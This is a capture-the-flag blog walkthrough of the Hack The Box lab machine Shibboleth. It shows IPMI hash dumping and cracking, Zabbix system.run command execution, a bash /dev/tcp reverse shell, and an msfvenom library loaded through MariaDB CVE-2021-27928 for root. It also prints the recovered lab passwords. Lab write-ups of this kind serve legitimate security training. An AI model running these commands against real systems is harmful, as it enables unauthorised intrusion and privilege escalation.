Tag Archives: mrb3n

Hack The Box: Shibboleth

Prelude

Shibboleth is an intermediate machine from HTB, developed by knightmare & mrb3n. This was an incredible machine with some cool vectors to foothold.

This machine had an IPMI interface setup and we could dump the hashes from it, without any authentication. Once we crack the hash, we could gain access to a Zabbix agent running in the target and gain code execution via that. Rooting the machine involved exploiting a CVE in Mariadb, which allowed us to load malicious libraries.

Let me elaborate on how I solved this box.

Exploitation

Nmap returned the following results.

Nmap scan report for 10.10.11.124
Host is up (0.055s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb

I’ve navigated to port 80 and it was redirecting to http://shibboleth.htb/.

So I’ve added the hostname to /etc/hosts and refreshed the page.

It was just a static HTML page.

So I’ve started bruteforcing the vhosts with gobuster. But there were too many false positives with 302 redirects. So I filtered all of the 302 from the output and got some interesting subdomains.

gobuster vhost -u http://shibboleth.htb -w $SUB |grep -v '302'

All of them were leading to the same page.

I detected the Zabbix version as 5.0 by loading zabbix home page and finding the URL leading to the documentation of the current version.

There were some vulnerabiliites related to this Zabbix version. So I tested them, but it seems that this instance of Zabbix was already patched.

So I did a UDP scan with nmap and found that port 623 was open.

Port 623 is the IPMI (Intelligent Platform Management Interface) port.
IPMI is a standardized message-based hardware management interface.
It is management and monitoring capabilities independently of the host system’s CPU, firmware and operating system.
IPMI have several advantages over VNC/RDP like access to BIOS, insertion of hardware etc.
Read more about advantages of IPMI

I found a github repo to dump hashes from IPMI port, without any authentication. This attack is explained here in detail.

I cloned the repo and provided it wordlist file to crack the hash.

Used it with a wordlist to dump and crack the hash.

sudo python3 ipmipwner.py --host  10.10.11.124 -uW user.txt -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash

And it found the plaintext of the hash as ilovepumpkinpie1

The script also mentioned that this password is of the Administrator user.

So, I tried Administrator:ilovepumkinpie1 as credentials for Zabbix and I’ve got in to the Zabbix console!

Then with some research and some trial and error, I’ve found a way to execute code on the target machine.

I’ve went to Configuration > Hosts > Shibboleth.htb > Items > Create Item and then added the following payload as the KEY.

system.run[cat /etc/passwd]

After that, I set Type of information as Text instead of Numeric (unsigned).

Then I clicked on Test.

After that, I clicked on Get Value to execute the code.

And I got the contents of /etc/passwd.

Code execution confirmed!

Then I changed the KEY to the following payload.

 system.run[bash -c 'bash -i >& /dev/tcp/10.10.14.86/9002 0>&1 &']

Notice that I’ve appended a & to the payload to make it run as a background job.
After swapping the payload, I then pressed Get Value and Test to get a shell back as zabbix.

Privilege Escalation #1

Once I was in as zabbix, I’ve found that there’s a user named ipmi-svc in the box and the user flag was in the home directory of ipmi-svc.

I’ve tried the password I got from Zabbix’s Database configuration, but it wasn’t the password for ipmi-svc.

So, I’ve tried su - ipmi-svc with the password ilovepumpkinpie1 and I got in!

Privilege Escalation #2

This machine had some rabbit holes, which are easy to slip into.

This machine had an SNMP agent, a cronjob running MySQL statement and the IPMI tool I’ve mentioned earlier.
All of these are rabbitholes and the real vector to root is CVE-2021-27928

This vulnerability allows any authenticated user of MariaDB to load malicious libraries and therbey execute code as root.

So, I created a malicious shared library using msfvenom.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.86 LPORT=9003 -f elf-so -o out.so

Then copied it to the target’s /tmp directory as out.so
After that, I’ve started a nc listener and loaded the malicous library using the following command.

mysql -u zabbix -D zabbix -p bloooarskybluh -e 'SET GLOBAL wsrep_provider="/tmp/out.so";'

And I’ve got a root shell back!

w00t!

Happy GIFs - Get the best gif on GIFER

Postlude

And that was Shibboleth!
A great machine that had some cool vectors to play with.

Kudos to knightmare & mrb3n for this awesome box!

Peace out! ✌️